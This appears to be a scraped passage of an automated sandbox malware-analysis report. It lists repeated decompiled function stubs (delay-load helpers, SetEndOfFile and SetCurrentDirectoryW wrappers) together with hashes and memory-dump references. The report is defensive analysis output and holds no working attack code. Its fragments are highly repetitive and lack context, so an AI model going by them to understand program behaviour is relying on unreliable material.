                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 82edf685798d621dac3ae1328fceb84549465ea026689a039c2399c7060ae2f4
                                                    • Instruction ID: 2a5b9199aa232d9c2ae8bc71c6e955bbead33276d006ddaca92ff94550044b79
                                                    • Opcode Fuzzy Hash: 82edf685798d621dac3ae1328fceb84549465ea026689a039c2399c7060ae2f4
                                                    • Instruction Fuzzy Hash: 3CA001E62A919A7D324872566E46C3B025DC8C1B29330952FFA25E96D1AC9018456873
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: b6af567acd30339c259eaab2d5594f8893139c0fb6a739c5cb18bc77e48814b4
                                                    • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                    • Opcode Fuzzy Hash: b6af567acd30339c259eaab2d5594f8893139c0fb6a739c5cb18bc77e48814b4
                                                    • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 5566987519b71ef7e774841d93a8c1c6646147044e8beeac51355f7f0b77709b
                                                    • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                    • Opcode Fuzzy Hash: 5566987519b71ef7e774841d93a8c1c6646147044e8beeac51355f7f0b77709b
                                                    • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 0ce9e03acd2583b185641c2a54a4d00dc50c68018bfb738a5e05145523d0ecd2
                                                    • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                    • Opcode Fuzzy Hash: 0ce9e03acd2583b185641c2a54a4d00dc50c68018bfb738a5e05145523d0ecd2
                                                    • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 0d08c898f319bc5651ef4db13299a43d7ebecb1467a9303be3b73c563d119de6
                                                    • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                    • Opcode Fuzzy Hash: 0d08c898f319bc5651ef4db13299a43d7ebecb1467a9303be3b73c563d119de6
                                                    • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: b693e4d475864cc74b716d8693bc2985ae86db523dafb35ec95bc33c07f5a160
                                                    • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                    • Opcode Fuzzy Hash: b693e4d475864cc74b716d8693bc2985ae86db523dafb35ec95bc33c07f5a160
                                                    • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1b274f8cd3f9d2a607d58651f3c5542a9002eeb84f3f71a852d07ed7906640b8
                                                    • Instruction ID: 193db1a61880c5c030977c10d5db240c3490fb630d45c57191d75820dfea41e9
                                                    • Opcode Fuzzy Hash: 1b274f8cd3f9d2a607d58651f3c5542a9002eeb84f3f71a852d07ed7906640b8
                                                    • Instruction Fuzzy Hash: F6A002D565D1557C314471566D46C37011DC4C5B55331556FF615C95C1784018556471
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: adcb99dfc991f71df1ae2791909b4f193acffcfc4cf7fd555a740dd5212139dc
                                                    • Instruction ID: 193db1a61880c5c030977c10d5db240c3490fb630d45c57191d75820dfea41e9
                                                    • Opcode Fuzzy Hash: adcb99dfc991f71df1ae2791909b4f193acffcfc4cf7fd555a740dd5212139dc
                                                    • Instruction Fuzzy Hash: F6A002D565D1557C314471566D46C37011DC4C5B55331556FF615C95C1784018556471
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 3dbaaff6afa2cbb29aafd789de013f9d21759909143e5035d05608ec215c2d62
                                                    • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                    • Opcode Fuzzy Hash: 3dbaaff6afa2cbb29aafd789de013f9d21759909143e5035d05608ec215c2d62
                                                    • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 7c78d723a8bd3918b72f3d0f59feca77159121e044cce37c56d5e83538066ef1
                                                    • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                    • Opcode Fuzzy Hash: 7c78d723a8bd3918b72f3d0f59feca77159121e044cce37c56d5e83538066ef1
                                                    • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: eb22ee22fe6dad20b1519a43e0cf0d5b72b90a34e09786fd39c9489a37214597
                                                    • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                    • Opcode Fuzzy Hash: eb22ee22fe6dad20b1519a43e0cf0d5b72b90a34e09786fd39c9489a37214597
                                                    • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9e3452e7403f15d43d7ce7c3167173f3f19810501c363a2e55eb637d354a169c
                                                    • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                    • Opcode Fuzzy Hash: 9e3452e7403f15d43d7ce7c3167173f3f19810501c363a2e55eb637d354a169c
                                                    • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 660f5bf91a88677a87905fe960a9c62afe201a4632cd29bb22dcd2654adcbec3
                                                    • Instruction ID: 42add9c61b296add59a1348830954788e19fa5e51da7a8f458f030caa9ad4914
                                                    • Opcode Fuzzy Hash: 660f5bf91a88677a87905fe960a9c62afe201a4632cd29bb22dcd2654adcbec3
                                                    • Instruction Fuzzy Hash: 63A011C22A80883C3008B2A22E82C3B022CC8C0B2A330822FFA00C82C0B88008002832
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E00CC9F09(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 8)); // executed
				asm("sbb al, al");
				return  ~(_t2 - 1) + 1;
			}




                                                    0x00cc9f0c
                                                    0x00cc9f15
                                                    0x00cc9f19

                                                    APIs
                                                    • SetEndOfFile.KERNELBASE(?,00CC903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CC9F0C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File
                                                    • String ID:
                                                    • API String ID: 749574446-0
                                                    • Opcode ID: 213ecbf179ae96e554054b617548102978a48f65569dcbac4b993f0a496b7d29
                                                    • Instruction ID: b71d1c34e2aa4a9568177139f87d60ad5b95fbd3556761eb7e23fef4d78663a9
                                                    • Opcode Fuzzy Hash: 213ecbf179ae96e554054b617548102978a48f65569dcbac4b993f0a496b7d29
                                                    • Instruction Fuzzy Hash: 46A0223008000E8BCE802B30CE0832C3B20FB20BC030002E8A00BCF0B2CF23880BCB22
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDAC04(WCHAR* _a4) {
				signed int _t4;

				_t4 = SetCurrentDirectoryW(_a4); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}




                                                    0x00cdac08
                                                    0x00cdac13

                                                    APIs
                                                    • SetCurrentDirectoryW.KERNELBASE(?,00CDAE72,C:\Users\user\Desktop,00000000,00D0946A,00000006), ref: 00CDAC08
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
